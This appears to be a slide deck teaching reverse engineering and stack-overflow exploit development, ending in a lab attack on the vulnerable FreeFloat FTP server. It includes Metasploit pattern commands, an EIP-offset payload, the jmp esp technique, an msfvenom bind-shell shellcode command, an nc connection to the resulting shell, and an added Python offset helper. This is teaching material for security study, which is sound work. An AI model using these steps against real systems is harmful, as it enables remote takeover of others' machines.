Reverse Engineering
Reverse Engineering and exploit development using
Metasploit
Priyal Walpita
[Link]
[Link]
● Importance of reverse engineering
● Introduction to tools
● Systems architecture
● Assembly language
● Stack overflow exploitation
● Metasploit
● Shellcode
Importance of reverse engineering
● Malware analysis
● Develop against closed solution interfaces
● Understand and defend against threats
● Find vulnerabilities
● Intellectual property theft
Prerequisites
● x86 and 64 bit systems architecture
● Assembly language
● Programming (C, C++, Python)
● Compilers
● x86 analysis
○ Immunity Debugger
○ [Link]ducts/debugger/
● 64 bit debugger
○ x64dbg-x64
○ [Link]
● C++ IDE
○ [Link]orwelldevcpp/
● Demo
Systems Architecture
● General CPU Registers
● 32 bit registers
● 64 bit registers
● Other Registers
● Assembly instructions
● Memory Segments
● Stack
General CPU Registers
32 bit Registers
General 64 bit Registers
Index Registers
Pointer Registers
Segment Registers
Flag Registers
Assembly
<Address> <opcode> <instruction/mnemonic> <operands>
Data Types
Memory Segments
Addressing mode
Little Endian
Code Analysis - Demo
Code Analysis - Demo 32 bit
Function Prolog
Code Analysis - Demo 64 bit
Stack
Stack Analysis
Write a simple C++ program with the following specification.
● A function with the following signature: int Add(int a, int b)
● Call the Add function from the main function and display the result in the main function
● Demonstrate and analyze how the stack, memory and opcodes behave in Immunity Debugger
Stack Overflow - Demo
Exploitation Tools
● Immunity Debugger: [Link]r/
● Exploits Database: [Link]
● Vulnerable FTP server - FreeFloat FTP: [Link]
Attack the FTP Server - DEMO
FTP Attack : Locate the offset
● Use the Metasploit pattern_create tool to generate a pattern
● Use the Metasploit pattern_offset tool to identify the offset
Attack the FTP Server - DEMO
Make sure you have the following tools in /usr/share/metasploit-framework/tools/exploit:
pattern_create.rb
pattern_offset.rb
● Attack the FTP server using the fuzzer
Attack the FTP Server - DEMO
● Generate the smart character pattern using the pattern_create.rb tool
./pattern_create.rb -l 1000
● Copy the output into your Python fuzzer program
● Attack the FTP server using the pattern fuzzer
● Track the EIP value in the debugger
Attack the FTP Server - DEMO
● Generate the pattern offset using pattern_offset.rb
./pattern_offset.rb -q <the EIP value> -l 1000
● Determine the offset value
● Adjust the payload accordingly with identifiable characters
● Eg: payload = "A" * 247 + "B" * 4 + "C" * 749
● Attack and test
The four B's are the bytes that land in the instruction pointer (EIP)
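The offset-location step above depends on two properties of the Metasploit pattern: every 4-byte window of it is unique, and the value shown in EIP is a little-endian dword, so its bytes must be reversed before searching. The following Python re-implements that logic so the arithmetic can be checked offline when triaging a crash; it is an added example, not the slides' code and not the Metasploit scripts, and the 0x69413269 value is derived here from the page's own 247-byte offset and 1000-byte pattern, not a captured debugger reading.

```python
# Re-implementation of the pattern_create / pattern_offset idea (added example).
import string
import struct

CHARSETS = (string.ascii_uppercase, string.ascii_lowercase, string.digits)
MAX_LEN = 26 * 26 * 10 * 3  # after this many chars the triplets would repeat


def pattern_create(length: int) -> str:
    """Build the cyclic 'Aa0Aa1Aa2...' pattern of exactly `length` characters.

    Each aligned triplet is <upper><lower><digit>, so no 4-byte window
    occurs twice within the first MAX_LEN characters.
    """
    if length > MAX_LEN:
        raise ValueError("pattern would repeat beyond %d characters" % MAX_LEN)
    out = []
    for upper in CHARSETS[0]:
        for lower in CHARSETS[1]:
            for digit in CHARSETS[2]:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def query_to_bytes(query) -> bytes:
    """Convert the EIP value into the bytes as they sit in the buffer.

    An int or a '0x'-prefixed hex string is a little-endian dword, so the
    bytes are reversed; any other string (e.g. 'i2Ai') is taken literally.
    """
    if isinstance(query, int):
        return struct.pack("<I", query)
    q = query.strip()
    if q.lower().startswith("0x"):
        return struct.pack("<I", int(q, 16))
    return q.encode()


def pattern_offset(query, length: int = 1000):
    """Return the buffer offset at which the EIP bytes start, or None."""
    needle = query_to_bytes(query)
    haystack = pattern_create(length).encode()
    idx = haystack.find(needle)
    return None if idx < 0 else idx


if __name__ == "__main__":
    # Offset 247 with a 1000-byte pattern (the page's numbers) implies EIP 0x69413269.
    print(pattern_offset("0x69413269", 1000))  # 247
```

A result of None means EIP did not come from the pattern at all (for example 0x41414141 after a plain "A" fuzz), which is the cue to re-run with the pattern rather than trust a guessed offset.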
Attack the FTP Server - DEMO
Find the ESP jmp address
● We need EIP to point at a jmp esp instruction, which transfers execution to our shellcode
● Find the jmp esp instruction in the vulnerable application
● Get the address of the jmp esp in [Link]
● Analyze the ESP area and the shell32 area
Attack the FTP Server - DEMO
Generate the shellcode and attack
● Use msfvenom to generate the shellcode
msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f python
● Edit the Python code
● Attack! Connect with: nc -nv <ip> <port>
FTP Attack : Attack with shellcode